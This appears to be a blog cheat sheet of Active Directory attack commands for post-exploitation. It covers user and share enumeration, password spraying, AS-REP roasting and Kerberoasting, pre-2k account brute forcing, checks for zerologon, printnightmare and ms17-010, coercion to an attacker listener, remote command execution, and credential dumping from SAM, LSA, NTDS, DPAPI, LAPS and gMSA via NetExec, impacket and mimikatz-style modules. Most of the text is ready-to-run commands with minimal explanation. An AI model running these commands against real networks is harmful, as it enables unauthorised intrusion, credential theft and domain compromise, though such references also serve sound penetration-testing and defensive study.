Active Directory Enum

Posted Feb 15, 2026 Updated May 31, 2026

15 min read

Active Directory Quick Enum

I creating a simple Quick recon check list for Active Directory environment in Internal Network for Post Exploitation and Persistence.

Scanning Active Directory

  
nmap -T4 -Pn -n -vv -A -sCV $IP
rustscan -a $IP -- -A
fscan -h $IP -p 1-65535 ALL

System & Identity

Identify the Domain Name and Domain IP Addresses.

  
[Domain Name]
nxc smb $target
nmap -sCV -T4 -vv -Pn -A $target

[DC IP]
host $Domain
nmcli dev show <interface>

[IPv6]
python3 IOXIDResolver.py -t  192.168.xx.xx

Assume Breach Scenario

—> Possible Common Attacks

Enumerate Users

  
nxc smb $ip -u '' -p '' --users
kerbrute  userenum --dc $IP -d $Domain  valid-users.lst  -v
net rpc group members 'Domain Users' -W '<domain> -l <ip> -U '%'
nxc smb $ip -u '' -p '' --rid-brute 10000 | grep -i 'sidtypeuser'
ldapsearch -x -H ldap://ip -D 'user@domain' -w 'pass' -b 'base_name_context' "(objectClass=user)" userPrincipalName
ldapsearch -x -H ldap://ip -D "<user>@<domain>" -w '<password>' -b "<base_name>" -s sub '(objectClass=user)' | grep -i samaccountname | awk -F' ' '{print $2}'
bloodyAD --host $ip -d $domain -u $user -p '$pass' get children --otype useronly
bloodyAD --host $ip -d $domain -u $user -p '$pass' get children --otype computer
impacket-lookupsid $domain/$user@$ip

Enumerate ldap

  
nmap -Pn -n -sV --script=ldap* -p 389 $ip -vv
ldapsearch -H ldap://ip -x -s base namingcontexts
ldapdomaindump -u $domain\\$user -p '$pass' $ip -o ldap/
ldapsearch -x -H ldap://<target_ip_or_hostname> -b "base name" "(objectClass=*)" "*"
bloodyAD --host $ip -d $domain -u $user -p '$pass' get writable --detail   
bloodyAD -u $user -p '$pass' -d $domain --host $ip get search --filter '(|(userPassword=*)(description=*))' --attr userPassword,description

Enumerate Shares

  
smbclient -U '%' -L //<ip>           #recurse OFF   #prompt OFF  #mget *
nxc smb $ip -u '' -p '' --shares
enum4linux-ng.py -a -u '' -p '' <ip>
manspider $ip -c passw -e xml config pdb -d $Domain -u '$user' -p '$pass'
smbclient.py $Username:'$pass'@FQDN
impacket-smbclient [domain]/[username]:[password]@[target_ip]  -k  [domain]/[username]:[LMHASH:NTHASH]@[target_ip]   

Generate Usernames

  
username-anarchy -i users.txt  > valid-user.lst
GenUser_list.sh  -i users.txt  > valid-user.lst

TimeRoast

  
timeroast.py <dc_ip> -o <output_log>
nxc smb  $ip -M timeroast
nxc smb  $ip -u '' -p '' -M timeroast
nxc smb  $ip -u '' -p '' -M timeroast  -k

Pre2k

  
nxc ldap $ip -u '' -p''  --computers
nxc ldap $ip -u '' -p '' -M pre2k      -k 
python3 pre2k.py unauth -d $domain -dc-ip $ip -inputfile Computers.lst -stoponsucces
python3 pre2k.py auth -u '$user' -p '$pass' -d $domain -dc-ip $ip -save -verbose
ldapsearch -x -H ldap://$IP -D "<user>@<domain>" -w '<password>' -b "<base_name>" -s sub '(objectClass=user)' | grep -i samaccountname | awk -F' ' '{print $2}'


[Hacker Recipe Resource]
# 1. find pre-created accounts that never logged on
ldapsearch-ad -l $LDAP_SERVER -d $DOMAIN -u $USERNAME -p $PASSWORD -t search -s '(&(userAccountControl=4128)(logonCount=0))' | tee results.txt

# 2. extract the sAMAccountNames of the results
cat results.txt | grep "sAMAccountName" | awk '{print $4}' | tee computers.txt

# 3. create a wordlist of passwords matching the Pre-Windows 2000 generation, based on the account names
cat results.txt | grep "sAMAccountName" | awk '{print tolower($4)}' | tr -d '$' | tee passwords.txt

# 4. bruteforce, line per line (user1:password1, user2:password2, ...)
nxc smb $DC_IP -u "computers.txt" -p "passwords.txt" --no-bruteforce

DNS

  
[zone Transfer]
dig @$IP $Domain  -t AXFR
dig AXFR $Domain @$IP

[Fetch all Records]
dig @$IP $Domain  -t ANY
dig ANY $Domain @$IP

[View SSL Certificate of HTTPS Websites]
sslscan $Domain

[DNS Spoofing Capturing NTLMV2 Hash]
- First you need a virtual Host which is not registered on DNS Records.
- Second, needs the server .pfx file and Also Crackable Password with(pfx2john)
- If all this found!, you are able to do this attack. (like Tryhackme Ra2 Room,i learned there)

Spray Password and Hash

  
nxc smb $ip -u '' -p '' --continue-on-success --no-brute-force
NetSpray all $ip -u '' -p ''  or   -H '' --continue-on-success --no-brute-force
kerbrute passwordspray -d <domain> --dc <DC_IP> <user_list> <password>   

AS-Reproasting

  
# It needs users file
nxc ldap $ip -u 'user.txt' -p '' --asreproast ASREPROAST
impacket-GetNPUsers -dc-ip $ip $Domain/ -usersfile valid_user.lst -format john -outputfile hashes
bloodyAD -u '$user' -p '$password' -d '$domain' --host '$host' get search --filter '(&(!(cn=krbtgt))(&(samAccountType=805306368)(servicePrincipalName=*)))' --attr sAMAccountName | grep sAMAccountName | cut -d ' ' -f 2

Kerbrosting

  
# It needs creds
nxc ldap $ip -u '' -p '' --kerberoasting output.txt
GetUserSPNs.py '$domain/$user:$pass' -dc-ip $ip -request

Kerbrosting Without preauth

  
nxc ldap $ip -u '' -p '' --asreproast asrep.txt 
GetUserSPN.py domain.local/ -users usersfile -no-preauth $USER -dc-ip $IP

Bloodhound loot

  
NetExec ldap $target -u '' -p '' --bloodhound --collection All --dns-server $target
bloodhound-python -d $Domain -u '$user' -p '$pass' -ns $ip -dc $Full_Domain -c All --zip
bloodyAD --host $ip -d $domin -u $user -p '$pass' get bloodhound --transitive --path ./Get_bloodhound_loot.zip
rusthound --domain $Domain -u '$user' -p '$pass' --zip
.\sharpHound.exe -s -c all,gpolocalgroup

—> Possible Protocals Attacks

SMB

It refers to Server Message Block,a network protocol for file/printer sharing across Windows, macOS, Linux, etc.

  
nxc smb -L
nxc smb -M <module> --options

[Guest Access]

nxc smb $ip -u '' -p '' 
nxc smb $ip -u 'Guest' -p ''
nxc smb $ip -u 'DoesNotExists'  -p ''

[Authentication]
nxc smb $ip -u '' -p ''                         # Null session
nxc smb $ip -u 'Guest' -p ''                    # Guest auth
nxc smb $ip -u '0xmr'  -p ''                    # Username no pass
nxc smb $ip -u user -p pass --local-auth        # Local auth
nxc smb $ip -u user -p pass -k                  # Kerberos auth
nxc smb $ip -u user -H <NTHASH>                 # Pass-the-Hash
nxc smb $ip -u user -p pass --aesKey <KEY>      # Pass-the-Key


[Enumeration]

nxc smb $ip -u '' -p '' --users                   # Enumerate users
nxc smb $ip -u '' -p '' --users --enabled         # Only enabled users
nxc smb $ip -u '' -p '' --users-export out.txt    # Export users list
nxc smb $ip -u '' -p '' --groups                  # Domain groups
nxc smb $ip -u '' -p '' --local-groups            # Local groups
nxc smb $ip -u '' -p '' --local-users             # Local users
nxc smb $ip -u '' -p '' --computers               # Enumerate computers
nxc smb $ip -u '' -p '' --shares                  # List shares
nxc smb $ip -u '' -p '' --dir "C$"                # List directory
nxc smb $ip -u '' -p '' --rid-brute 20000         # RID brute force
nxc smb $ip -u '' -p '' --loggedon-users          # Logged on users
nxc smb $ip -u '' -p '' --sessions                # SMB sessions
nxc smb $ip -u '' -p '' --disks                   # Enumerate disks
nxc smb $ip -u '' -p '' --qwinsta                 # RDP sessions
nxc smb $ip -u '' -p '' --pass-pol                # Password policy
nxc smb $ip -u '' -p '' --dc-list                 # List DCs
nxc smb $ip -u '' -p '' --interfaces              # Network interfaces
nxc smb $ip -u '' -p '' -M enum_av                # AV/EDR detection
nxc smb $ip -u '' -p '' -M webdav                 # Check WebDAV/WebClient
nxc smb $ip -u '' -p '' -M slinky                 # SCF/LNK file drop in shares
nxc smb $ip -u '' -p '' --generate-krb5-file <out> # Generate krb5 file
nxc smb $ip -u '' -p '' --generate-hosts /etc/hosts
nxc smb $ip -u '' -p '' --continue-on-success --no-bruteforce


[Attack]

nxc smb $ip -u '' -p '' -X 'Get-Process'          # PowerShell execution
nxc smb $ip -u '' -p ''  -M change-password -o USER=TargetUser NEWPASS=  or NEWHASH= 
nxc smb $ip -u '' -p ''  -M spider_plus -o DOWNLOAD_FLAG=true            
nxc smb $ip -u '' -p ''  -x 'whoami /all'   
nxc smb $ip -u '' -p ''  -M timeroast          
nxc smb $ip -u '' -p ''  -M veeam                  # Veeam creds from SQL
nxc smb $ip -u '' -p ''  -M petitpotam             # Check PetitPotam
nxc smb $ip -u '' -p ''  -M coerce_plus -o LISTENER=<AttackerIP> ALWAYS=true

[Top CVE]

nxc smb $ip -u '' -p '' -M zerologon 
nxc smb $ip -u '' -p '' -M nopac 
nxc smb $ip -u '' -p '' -M printnightmare 
nxc smb $ip -u '' -p '' -M smbghost 
nxc smb $ip -u '' -p '' -M ms17-010 
nxc smb $ip -u '' -p '' -M ntlm_reflection 
nxc smb $ip -u '' -p '' -M spooler 
nxc smb $ip -u '' -p '' --gen-relay-list f.txt 
nxc smb $ip -u '' -p '' -M coerce_plus -o LISTENER=<AttackerIP> ALWAYS=true


[Credential Dumping]

nxc smb $ip -u '' -p '' --sam                 
nxc smb $ip -u '' -p '' --lsa                 
nxc smb $ip -u '' -p '' --ntds                  
nxc smb $ip -u '' -p '' -M ntdsutil  or --ntds       
nxc smb $ip -u '' -p '' --dpapi                 
nxc smb $ip -u '' -p '' --dpapi_hash
nxc smb $ip -u '' -p '' --laps
nxc smb $ip -u '' -p '' -M backup_operator
nxc smb $ip -u '' -p '' -M wifi
nxc smb $ip -u '' -p '' -M putty
nxc smb $ip -u '' -p '' -M ntdsutil  or --ntds
nxc smb $ip -u '' -p '' -M lsassy
nxc smb $ip -u '' -p '' -M nanodump
nxc smb $ip -u '' -p '' -M mimikatz
nxc smb $ip -u '' -p '' -M putty
nxc smb $ip -u '' -p '' -M vnc
nxc smb $ip -u '' -p '' --dpapi_hash  or --dpapi
nxc smb $ip -u '' -p '' -M notepad  or -M notepad++
nxc smb $ip -u '' -p '' -M winscp

LDAP

It refers to Lightweight Directory Access Protocol.

  
nxc ldap -L                                             
nxc ldap -M <module> --options  

[Authentication]

nxc ldap $ip -u '' -p ''                          # Null session
nxc ldap $ip -u user -p pass                      # Basic auth
nxc ldap $ip -u user -p pass -k                   # Kerberos auth
nxc ldap $ip -u user -H <NTHASH>                  # Pass-the-Hash
nxc ldap $ip -u user -p pass --local-auth         # Local auth
nxc ldap $ip -u user -p pass --aesKey <KEY>       # Pass-the-Key

[Enumeration]

nxc ldap $ip -u '' -p '' --users             
nxc ldap $ip -u '' -p '' --groups           
nxc ldap $ip -u '' -p '' --computers        
nxc ldap $ip -u '' -p '' --dc-list         
nxc ldap $ip -u '' -p '' --active-users      
nxc ldap $ip -u '' -p '' --admin-count             # AdminCount=1 users
nxc ldap $ip -u '' -p '' --trusted-for-delegation  # Unconstrained delegation
nxc ldap $ip -u '' -p '' --password-not-required   # PASSWD_NOTREQD flag
nxc ldap $ip -u '' -p '' --find-delegation         # All delegation types
nxc ldap $ip -u '' -p '' --pass-pol
nxc ldap $ip -u '' -p '' -M pre2k -o ALL=True

[Kerbros Attacks]

nxc ldap $ip -u '' -p '' --kerberoasting kerberoast.txt           # Kerberoasting
nxc ldap $ip -u '' -p '' --kerberoasting kerberoast.txt --kdcHost $ip
nxc ldap $ip -u user.txt -p '' --asreproast asrep.txt             # AS-REP Roasting
nxc ldap $ip -u '' -p '' --asreproast asrep.txt                   # No-auth AS-REP

[Credntial Dumping]

nxc ldap $ip -u '' -p '' --gmsa                             # Dump gMSA passwords (auto-uses LDAPS)
nxc ldap $ip -u '' -p '' -M maq                             # Machine Account Quota
nxc ldap $ip -u '' -p '' -M get-desc-users                  # Passwords in user description fields
nxc ldap $ip -u '' -p '' -M laps                            # Read LAPS passwords
nxc ldap $ip -u '' -p '' -M laps -o TARGET=<computer>             # LAPS for specific machine
nxc ldap $ip -u '' -p '' -M get-unixUserPassword
nxc ldap $ip -u '' -p '' -M get-userPassword
nxc ldap $ip -u '' -p '' -M user-desc


[ADCS]
nxc ldap $ip -u '' -p '' -M adcs                            # Find CA servers (ESC enumeration)
nxc ldap $ip -u '' -p '' -M certipy-find
nxc ldap $ip -u '' -p '' -M adcs -o SERVER=<CA>             # Target specific CA

[Bloodhound loot]
nxc ldap $ip -u '' -p '' --bloodhound --collection All

[Trusts]

nxc ldap $ip -u '' -p '' --dc-list                          # Enum trusts (replaces old -M enum_trusts)
nxc ldap $ip -u '' -p '' -M raisechild                      # Abuse domain trust: child → parent DA

[Enum]

nxc ldap $ip -u '' -p '' -M ldap-checker
nxc ldap $ip -u '' -p '' -M pso                             # Dump Password Settings Objects (Fine-Grained Policy)
nxc ldap $ip -u '' -p '' -M sccm                            # Enumerate SCCM servers/sites
nxc ldap $ip -u '' -p'' -M entra_id                        # Enumerate Entra ID (Azure AD) objects

Winrm

(Windows Remote Management)

WinRM is more like sending text messages to a computer. Instead of seeing the screen, you send commands (usually through PowerShell) and get back text results Prots 5985(http) or 5986(https) It works behind the scenes using standard web protocols (like HTTP/HTTPS), so it plays nicely with firewalls and networks.

  
nxc winrm -L 

[Authentication]
nxc winrm $ip -u user -p pass                         # Basic auth (port 5985)
nxc winrm $ip -u user -p pass -d DOMAIN               # Specify domain (when SMB port closed)
nxc winrm $ip -u user -H <NTHASH>                     # Pass-the-Hash
nxc winrm $ip -u user -p pass --local-auth            # Local account auth

[Pass spray]
nxc winrm $ip -u '' -p '' --continue-on-success --no-bruteforce

[Command Execution]
nxc winrm $ip -u '' -p '' -X 'whoami'

[Enum]
nxc winrm $ip -u user-can-read-laps -p '' --laps

[Credential Dumping]
nxc winrm $ip -u '' -p '' --sam           
nxc winrm $ip -u '' -p '' --lsa                
nxc winrm $ip -u '' -p '' --dpapi               

RDP

(Remote Desktop Protocal)

Think of RDP like a video call for your computer. It lets you see and control another computer’s desktop as if you were sitting right in front of it. You can open apps, click around, drag files—it feels totally normal Port 3389

  
nxc rdp -L 

[AUthentication]
nxc rdp $ip -u user -p pass                       # Test single cred
nxc rdp $ip -u user -H <NTHASH>                   # Pass-the-Hash

[Enum]
nxc rdp $ip --nla-screenshot  # Works when nla=false
nxc rdp $ip -u '' -p '' --screenshot
nxc rdp $ip -u '' -p '' --screenshot --screentime 5

[Command Execution]
nxc rdp $ip -u '' -p '' -x 'whoami'
nxc rdp $ip -u '' -p '' -x 'whoami' --cmd-delay 2
nxc rdp $ip -u '' -p '' -x 'whoami' --clipboard-delay 2

Mssql

(Micorsoft SQL Server)

Think of it like interacting with a virtual terminal for MSSQL Servers. It is relational database management system. Port 1433

Enumeration Cheatsheet

  
nxc mssql -L

[Authentication Mode]
nxc mssql $ip -u '' -p ''
nxc mssql $Ip -u '' -p '' --local-auth
nxc mssql $Ip -u '' -p '' --local-auth --port 1433
nxc mssql $ip -k --use-kcache --local-auth


[Basic Enum]
nxc mssql $ip -u '' -p '' --continue-on-success --no-bruteforce   # Brute force
nxc mssql $ip -u '' -p '' --rid-brute 20000
nxc mssql $ip -u '' -p '' --query 'select @@VERSION'
nxc mssql $ip -u '' -p '' -x 'whoami'

[Modules]
nxc mssql $ip -u '' -p '' -M enum_impersonate
nxc mssql $ip -u '' -p '' -M enum_links
nxc mssql $ip -u '' -p '' -M enum_logins
nxc mssql $ip -u '' -p '' -M mssql_cbt
nxc mssql $ip -u '' -p '' -M mssql_priv

[Credential Dumping]
nxc mssql $ip -u '' -p '' -M mssql_dumper
nxc mssql $ip -u '' -p '' -M nanodump
nxc mssql $ip -u '' -p '' --sam
nxc mssql $ip -u '' -p '' --lsa

[PRIVILEGE_ESCALATION]
nxc mssql $ip -u '' -p '' -M enable_cmdshell  -o ACTION=disable  or  -o ACTION=enable
nxc mssql $ip -u '' -p '' -M exec_on_link -o LINKED_SERVER=Name COMMAND='select @@VERSION'
nxc mssql $ip -u '' -p '' -M mssql_coerce

FTP

(File Transfer Protocal)

  
nxc ftp $ip
nxc ftp $ip -u 'Anonymous' -p 'Anonymous'
nxc ftp $ip -u 'anonymous' -p 'anonymous'

nxc ftp $ip -u '' -p '' --ls
nxc ftp $ip -u '' -p '' --get <File_Name>
nxc ftp $ip -u '' -p '' --put <File_Name>

Coming soon…

Cheatsheet

AD AD Enum

This post is licensed under CC BY 4.0 by the author.

Active Directory Quick Enum

Scanning Active Directory

System & Identity

Assume Breach Scenario

—> Possible Common Attacks

Enumerate Users

Enumerate ldap

Enumerate Shares

Generate Usernames

TimeRoast

Pre2k

DNS

Spray Password and Hash

AS-Reproasting

Kerbrosting

Kerbrosting Without preauth

Bloodhound loot

—> Possible Protocals Attacks

SMB

LDAP

Winrm

RDP

Mssql

FTP

Coming soon…

Trending Tags